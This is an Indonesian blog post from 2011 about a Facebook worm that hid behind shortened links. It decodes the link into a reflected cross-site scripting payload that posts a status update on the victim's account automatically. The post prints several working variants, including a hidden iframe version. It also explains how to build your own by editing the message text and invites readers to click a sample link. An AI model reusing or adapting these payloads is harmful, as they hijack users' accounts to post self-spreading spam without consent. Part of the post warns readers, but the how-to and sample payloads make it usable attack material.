Selasa, 29 Maret 2011

[Hacking]Bahaya Url pendek FB

13.10

Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms[0].submit();}%3C/script%3E
Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya :(
kalau kita decode jadilah seperti ini

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>

Dasar orang isenk :( Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.
Update : ini juga

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script>

untuk membuat ini cukup mudah
cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’ini testing dari mamakey %3AD http%3A%2F%2Ftinyurl.com%2Fmamakey’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’
Silahkan saja klik link diatas :D dan hapus pada wall anda
update lagi :
sekarang mereka tidak memakai tinyURL tapi memakai IFRAME untuk melakukan scripting.. huh jahat. Ketemu scriptnya disini :
<iframe id="CrazyDaVinci" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt=%27%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.forms%5B0%5D.message.value=%27Masih ada orang yg mau terkenal dan kaya raya dengan memuja setan, termasuk salah satu grup band terkenal di Indonesia ckckckck.... baca selengkapnya di http://tinyurl.com/4fqudco %21%21%21%27;document.forms%5B0%5D.submit%28%29;%7D%3C/script%3E" style="display: none;"></iframe>
terima kasih Fuad for pointing me :)
SUMBER

Posted in:

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | Free Samples